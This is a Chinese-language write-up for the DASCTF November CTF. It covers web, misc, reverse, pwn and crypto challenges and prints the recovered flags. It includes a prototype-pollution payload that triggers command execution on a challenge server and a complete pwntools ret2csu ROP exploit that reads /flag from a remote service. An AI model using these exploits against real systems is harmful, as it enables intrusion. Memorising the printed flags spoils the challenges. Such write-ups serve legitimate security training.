DASCTF十一月挑战赛

Web

realrce

import requests

url = 'http://4d2b8a71-91db-4dbf-b95a-6be4d3505e29.node4.buuoj.cn:81/'

payload = {
    "msg": {
        "__proto__": {
            "cmd_rce": "env",
            "tingshuitingdiandaxue": "%dd"
        }
    }
}

try:
    response = requests.post(url, json=payload)

    print(response.text)
except requests.exceptions.RequestException as e:
    print(e)

Misc

IceTea

/www/wwwroot/DAS202310.com/

cd "/www/wwwroot/DAS202310.com";

./ezbase e flag.txt IceTea.txt;

可以看到对flag.txt执行了base加密操作，追踪TCP流，在流0处，找到一个ELF文件

dump下来查壳发现有upx壳，脱壳后得到Base64的表（这应该是出题人设想的预期解）但实际上我猜测elf文件损坏，导致无法直接使用UPX脱壳工具自动脱壳。在HTTP流4，找到密文（🐜🗡流量要去掉前两位）

IDA打开dump下来的elf文件，查看strings，发现有疑似base表的信息，跟进去看一下

Shift+e看一下

解一下Hex，就可以看到表了，手动去一下干扰字符

https://cyberchef.cn/#recipe=From_Base64('abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ%2B/',true,false)&input=cmVmdHFScmc0UUI5enZaUXp3ZjUweG41MUNaUXhTZjUxZ1pQenhqNXpoakYxQ0k3NXFFPQ

Reverse

ezpython

010打开pyc文件发现key：yuanshen

import importlib

print(importlib.util.MAGIC_NUMBER.hex())
#a70d0d0a

得到Python3.11的Magic Number，用010修复pyc

使用工具反编译

import pyDes

def adjust_length(str):
    if len(str) < 8:
        str = str.ljust(8, '0')
    elif len(str) > 8:
        str = str[:8]
    return str


def yuanshen(array, start, end):
Unsupported opcode: JUMP_BACKWARD
    num = len(array)
    dis = [
        float('inf')] * num
    tree = [
        False] * num
    parent = [
        -1] * num
    dis[start] = 0
# WARNING: Decompyle incomplete


def qidong(input, key, IV):
    cipher = pyDes.des(key, pyDes.CBC, IV, pad = None, padmode = pyDes.PAD_PKCS5)
    encrypted_data = cipher.encrypt(input)
    encrypted_hex_list = encrypted_data()
    return encrypted_hex_list


def main():
    data = [
        159,
        41,
        201,
        125,
        67,
        60,
        44,
        34,
        203,
        56,
        116,
        186,
        13,
        71,
        125,
        30,
        84,
        123,
        109,
        54,
        106,
        56,
        17,
        124,
        87,
        236,
        25,
        12,
        80,
        178,
        165,
        123]
    key = input('璇疯緭鍏ey: ')
    if len(key) != 8:
        print('wrong key lenth!')
        exit()
    flag = input('璇疯緭鍏lag: ')
    array = [
        [
            0,
            float('inf'),
            float('inf'),
            1,
            3,
            4,
            float('inf'),
            float('inf'),
            float('inf')],
        [
            float('inf'),
            0,
            float('inf'),
            float('inf'),
            float('inf'),
            2,
            float('inf'),
            4,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            0,
            8,
            1,
            float('inf'),
            float('inf'),
            float('inf'),
            1],
        [
            1,
            float('inf'),
            8,
            0,
            3,
            5,
            1,
            2,
            float('inf')],
        [
            3,
            float('inf'),
            1,
            3,
            0,
            float('inf'),
            1,
            5,
            3],
        [
            4,
            2,
            float('inf'),
            5,
            float('inf'),
            0,
            float('inf'),
            1,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            float('inf'),
            1,
            1,
            float('inf'),
            0,
            float('inf'),
            5],
        [
            float('inf'),
            4,
            float('inf'),
            2,
            5,
            1,
            5,
            0,
            float('inf')],
        [
            float('inf'),
            float('inf'),
            1,
            float('inf'),
            3,
            float('inf'),
            float('inf'),
            float('inf'),
            0]]
    t = yuanshen(array, 1, 8)
    IV = (lambda .0: Unsupported opcode: RETURN_GENERATOR
pass# WARNING: Decompyle incomplete
)(t())
    IV = adjust_length(IV)
    check = qidong(flag, key, IV)
    if check == data:
        print('yes,yes,yes!!')
        return None
    ''.join('bad,bad,bad!!')

main()

GPT分析了解到是最短路径算法，根据array数组得到iv=15736428，最后解DES

from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

def decrypt_des_cbc(ciphertext, key, iv):
    cipher = DES.new(key.encode(), DES.MODE_CBC, iv.encode())
    decrypted_data = unpad(cipher.decrypt(bytes(ciphertext)), DES.block_size)
    return decrypted_data.decode()

data = [
        159,
        41,
        201,
        125,
        67,
        60,
        44,
        34,
        203,
        56,
        116,
        186,
        13,
        71,
        125,
        30,
        84,
        123,
        109,
        54,
        106,
        56,
        17,
        124,
        87,
        236,
        25,
        12,
        80,
        178,
        165,
        123]

key = "yuanshen"
iv = "15736428"

flag = decrypt_des_cbc(data, key, iv)
print(flag)

#DASCTF{D0_U_4ls0_l1k3_7uansH3n}

Pwn

asadstory

ret2csu把close最后一位改成\x15,变成syscall然后用read控rax，openat替换open

from pwn import *

context.arch = 'amd64'
libc = ELF('./libc-2.31.so')  
elf = ELF('./challenge')      

# p = process("./challenge")
p = remote("node4.buuoj.cn", 28133)

def elf_base():
    p.sendlineafter(b': ', b'1')
    p.sendlineafter(b': ', b'1')
    p.recvuntil(b'0x')
    value = int(p.recv(12), 16) - 0x1249
    return value

elf.address = elf_base()
print("elf-->" + hex(elf.address))

csu1 = elf.address + 0x1620
csu2 = elf.address + 0x163a

offset = b'a' * 0x38

# Craft the ROP chain
rop_chain = [
    csu2, 0, 1, 0, elf.got['close'], 1, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    csu2, 0, 1, 0, elf.address + 0x4280, 257, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    csu2, 0, 1, 0, elf.address + 0x4280, 0, elf.got['close'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    csu2, 0, 1, 1, elf.address + 0x4280, 0x30, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    csu2, 0, 1, 0, elf.address + 0x4280 + 0x30, 1, elf.got['read'],
    csu1, 0, 0, 0, 0, 0, 0, 0,
    csu2, 0, 1, 2, elf.address + 0x4280, 0x30, elf.got['close'],
    csu1
]


payload = b''.join([p64(addr) for addr in rop_chain])


p.sendline(b'2')
p.sendline(offset + payload)
p.send(b'\x15')
p.send(b'/flag' + b'\x00' * (257 - 5))
p.send(b'\x00' * 1)
p.interactive()

Crypto

GeneratePrime

from Crypto.Util.number import *

n=43090231453250894711427929679917165532091051269639380881822679198388872373018031295429558758883298138388596507242928145888959963579111847255588834248367032580980272245414738073179172684104908272069503607376171584936239696444309039211273376010193165083254209608051430794825261116490356392215410064858020176711199543381037420111454942356936721487016187240237683725310306748046587503625096246489043270381153251813360521583717685413070481576320194446237522118380283335294528606720928637529817170809666802598938788405154468683850385277659812316577873886708164549255359514776884765904417881419804464020855420288884972204146588152412816874161445668955639456202226751519881834234916642218078966066353317917939418964763844067220460513388433020071277477619189495465483910271310025371745344364984826481983188861624474015117761898377237745775289039922285111681410319016537270412509750339539020876501534842403407208957382830000761065368861209033791387480377889838737241326116532852335478193204425626487166234964754732945953080086117315162916374952094149599597509405176646068341218684523765974759907645226607364627690026025662221036766148813918691578120023886400197652148214238256715089883892069133754778609710846757189987335827693169644541734443763194942694587436469448973201513131503797898892822373949177030567791519349220158287318717788746060997955057747930375117780320371517616412423571775682868481089431670802944047375824503353609019686495670630728618082254293585479431369645935654024149490741245953271830453426444847467908952699660750809490650479987
e=65537
c=30862228874892553476569860337345503267926249096036551213683005116620750680365154103242717714230966827288361499342464202425467642950081816675486231250411347472976482409360391136808439034217688010072648722396312121758844966972323513456884732046270240934002095706243044210312663525491282667971502534420245427643076262414036655243117610886157895994101178663474990136516153062956803591842233732498519246731337518545018734984319536536205092573418457928952414660837594265802406473201400259189950484841504227372735345451459452313825309333631615286962304963039625162366186574440146535361888708570569938418676320446653266676364765870547213167058713058609788316647593834008151805692510044158607162858906528913516242904419457446211348504248317409844426309455978985314882123424453618672960876022996245213882467954521212481418830104602302179759479012618982228223244131619557639469872139485197176384683400796204681045965981417650462297978265085323342772310690638049411549216990505001950512428646871875659468885490055363436412364532718888124906227240501145227269727887236864060558999336443165765870556727793253297515155026234234422303238380776900105115890363548589834345888430695886678231459920101695996112312269637459823479947618045447071359886515163416153117176539752947700226596291435270282598638974889205601333097978743387412651687356072223691445472690647184292120882095587563356691450107194982597794937293154289560470269606300576216128045797481404606810315677962659136641943747123985144899464108823536597185386155005111274476874957827391438859327653936
k = 5

R = Zmod(n)["x"]
while True:
    Q = R.quo(R.random_element(k))
    pp = gcd(ZZ(list(Q.random_element() ^ n)[1]), n)
    if pp != 1:
        qq = sum([pp**i for i in range(k)])
        rr = n // (pp * qq)
        assert n == pp * qq * rr
        break
phi = (pp - 1) * (qq - 1) * (rr - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))

#DASCTF{just_a_very_very_easy_task_with_your_talent_is_not}